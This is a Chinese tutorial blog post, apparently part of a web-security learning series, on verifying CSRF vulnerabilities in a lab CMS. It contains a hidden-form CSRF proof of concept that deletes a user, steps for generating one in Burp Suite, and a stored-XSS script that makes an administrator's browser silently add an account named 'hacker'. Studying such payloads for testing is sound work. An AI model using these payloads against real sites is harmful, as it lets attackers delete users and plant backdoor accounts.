4.2验证CSRF漏洞
Posted 白帽子养成记
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了4.2验证CSRF漏洞相关的知识,希望对你有一定的参考价值。
手工检测
前提
CSRF只能通过用户的正规操作进行攻击,实际上就是劫持用户操作。
在检测前首先需要确定Web应用程序的所有功能
以及确定哪些操作是敏感的
比如修改密码、转账、发表留言等功能
第一步 抓取删除用户的数据包
第二步 编写CSRF POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.146.148/cms/admin/user.action.php" method="POST">
<input type="hidden" name="act" value="delete" />
<input type="hidden" name="userid" value="31" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
第三步 提交poc查看
半自动检测
借助工具burpsuit
第一步 在管理员处添加用户
第二步 抓取数据包
第三步 右击--->Engagemet tools---> Generate CSRF PoC
第四步 保存poc,并访问
第五步 查看添加用户信息
xss+CSRF结合使用
第一步 在留言板处,将poc写入留言板内容
<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open(\'post\',\'http://192.168.232.129/cms/admin/user.action.php\',false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send(\'act=add&username=hacker&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0\');
</script>
第二步 管理元登录后台,查看留言
第三步 查看是否添加用户
摘抄
生活,
一半诗意一半烟火;
人生,
一半努力一半随缘;
努力做一个清醒、自律、坦荡的人。
以上是关于4.2验证CSRF漏洞的主要内容,如果未能解决你的问题,请参考以下文章